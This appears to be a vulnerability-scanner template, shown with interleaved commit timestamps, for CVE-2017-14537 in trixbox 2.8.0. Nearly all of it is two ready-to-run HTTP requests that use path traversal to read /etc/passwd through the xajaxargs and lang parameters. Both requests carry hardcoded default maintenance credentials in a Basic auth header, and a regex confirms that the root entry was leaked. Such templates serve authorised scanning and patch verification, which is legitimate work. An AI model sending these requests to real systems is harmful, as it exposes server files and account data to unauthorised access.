2021-01-02 05:02:50 +00:00
|
|
|
id: CVE-2017-14537
|
2020-09-04 04:26:20 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: trixbox 2.8.0 - directory-traversal
|
|
|
|
author: pikpikcu
|
|
|
|
severity: medium
|
|
|
|
|
|
|
|
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537
|
2020-09-04 11:39:45 +00:00
|
|
|
# https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
|
2020-09-04 04:26:20 +00:00
|
|
|
# Product vendor:-https://sourceforge.net/projects/asteriskathome/
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /maint/index.php?packages HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
|
|
Accept-Language: en-US,en;q=0.5
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
Referer: {{Hostname}}/maint/index.php?packages
|
|
|
|
Content-Length: 160
|
|
|
|
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
|
|
|
|
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
|
|
|
|
Connection: keep-alive
|
|
|
|
|
|
|
|
xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages
|
|
|
|
|
|
|
|
- |
|
|
|
|
GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
|
|
Accept-Language: en-US,en;q=0.5
|
|
|
|
Referer: {{Hostname}}/maint/index.php?packages
|
|
|
|
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
|
|
|
|
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
|
|
|
|
Connection: keep-alive
|
|
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0:"
|
|
|
|
part: body
|